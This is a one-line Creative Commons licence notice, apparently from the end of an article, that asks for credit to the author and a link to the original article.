    This work is licensed under the CC licence; reproduction must credit the author and link to the original article.